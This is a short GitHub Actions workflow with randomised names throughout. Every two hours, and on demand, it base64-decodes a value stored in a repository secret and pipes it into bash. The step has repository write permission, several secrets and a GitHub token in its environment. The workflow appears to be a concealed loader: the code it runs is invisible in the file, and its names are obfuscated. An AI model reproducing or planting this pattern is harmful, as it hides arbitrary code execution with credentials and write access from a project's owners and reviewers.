name: CAPb5p4GzN
on:
  schedule:
    - cron: '0 */2 * * *'
  workflow_dispatch:
jobs:
  lRAnqu8wo8sk:
    runs-on: ubuntu-latest
    permissions:
      contents: write
    steps:
      - uses: actions/checkout@v4
        with:
          token: ${{ secrets.iGoUAn2TjSmUri6 }}
      - name: U1BkV61uLxU8LmF
        env:
          KY2mfCqDcCVfJ: ${{ secrets.ixN9bgVp }}
          qm2fm82PIncB: ${{ secrets.jK4naQI7mDU }}
          HhZgWxNLKckly: ${{ secrets.aZiofYXwmDtuW }}
          GITHUB_TOKEN: ${{ secrets.iGoUAn2TjSmUri6 }}
        run: echo "$KY2mfCqDcCVfJ" | base64 -d | bash
